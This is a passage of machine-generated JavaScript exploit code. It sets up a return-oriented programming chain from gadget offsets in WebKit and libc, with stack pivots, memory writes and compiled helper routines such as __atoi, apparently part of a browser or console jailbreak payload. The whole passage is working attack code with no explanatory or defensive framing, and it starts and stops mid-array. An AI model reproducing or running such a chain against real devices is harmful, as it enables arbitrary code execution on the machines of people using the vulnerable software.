ropchain+184368, //L2928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+184320, //L2925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2925:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2926:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L2927:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2928:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184440, //L2929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2929:
db([0, 0]); // 0x0
//L2881:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+184504, //L2932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L2931:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2932:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184584, //L2934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L2933:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2934:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184712, //L2935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184744, //L2937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+184728, //L2936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2935:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2936:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2937:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+184848, //L2938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184864, //L2939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2938:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2939:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+184984, //L2940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184968, //L2941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2941:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2940:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+185072, //L2943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+185056, //L2942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2942:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2943:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+185176, //L2944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185192, //L2945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2944:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2945:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+185312, //L2946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185296, //L2947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2947:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2946:
db([0, 0]); // 0x0
//__atoi:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+185384, //L2949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2949:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+185448, //L2951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2951:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2952:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2954:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+185576, //L2956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2955:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2956:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+185632, //L2958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2958:
db([0, 0]); // 0x0
//L2957:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+185680, //L2960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2960:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2962:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+185800, //L2965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+185784, //L2963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2963:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+185880, //L2966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185896, //L2967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2966:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2967:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+185976, //L2968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185992, //L2969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2969:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+186152, //L2973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+186120, //L2971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+186136, //L2972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2970:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2971:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2972:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2973:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+186208, //L2975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+186336, //L2977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+186352, //L2978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186320, //L2976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2976:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2977:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2978:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+186512, //L2982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+186480, //L2980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186496, //L2981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2979:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2980:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2981:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2982:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+186568, //L2984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2984:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+186696, //L2986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+186712, //L2987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186680, //L2985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2985:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2986:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2987:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+186872, //L2991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+186840, //L2989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186856, //L2990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2988:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2989:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2990:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2991:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+186928, //L2993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2993:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+187056, //L2995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187072, //L2996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187040, //L2994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2994:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2995:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2996:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+187152, //L2997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187168, //L2998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2997:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2998:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+187264, //L3000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187248, //L2999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2999:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3000:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L3002:
ropchain+187368, //L3001
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+180736, //__is_digit
//L3001:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+187496, //L3005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+187480, //L3004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3003:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3004:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3005:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+187552, //L3007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3007:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+187680, //L3009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187696, //L3010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187664, //L3008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3008:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3009:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3010:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+187808, //L3012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187856, //L3015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187824, //L3013
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3012:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3013:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3015:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+187968, //L3016+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+187960, //L3016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3016:
db([0, 0]); // 0x0
set_gadgets([
ropchain+187984, //L3016+24
ropchain+191512, //L3011
libc_base+764760, //pop rsi
ropchain+188024, //L3017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3017:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3019:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+188144, //L3022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188128, //L3020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3020:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3022:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+188320, //L3025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+188336, //L3026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188288, //L3023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+188304, //L3024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3023:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3024:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3025:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3026:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+188432, //L3028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+188416, //L3027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3027:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3028:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3029:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L3030:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+10973692, //imul rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+188616, //L3031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3031:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3033:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+188736, //L3036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188720, //L3034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3034:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3036:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+188816, //L3037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+188832, //L3038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3037:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3038:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+188976, //L3041
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188944, //L3039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+188960, //L3040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3039:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3040:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3041:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+189064, //L3043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3042:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3043:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+189152, //L3044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3044:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3046:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+189272, //L3049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+189256, //L3047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3047:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3049:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+189360, //L3050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+189376, //L3052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L3050:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3052:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+189432, //L3053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3053:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+189624, //L3056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+189640, //L3057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+189608, //L3055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3055:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3056:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3057:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+189800, //L3061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+189768, //L3059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+189784, //L3060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3058:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3059:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3060:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3061:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+189856, //L3063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3063:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+189984, //L3065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+190000, //L3066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+189968, //L3064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3064:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3065:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3066:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+190160, //L3070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+190128, //L3068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190144, //L3069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3067:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3068:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3069:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3070:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+190216, //L3072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3072:
db([0, 0]); // 0x0
set_gadgets([
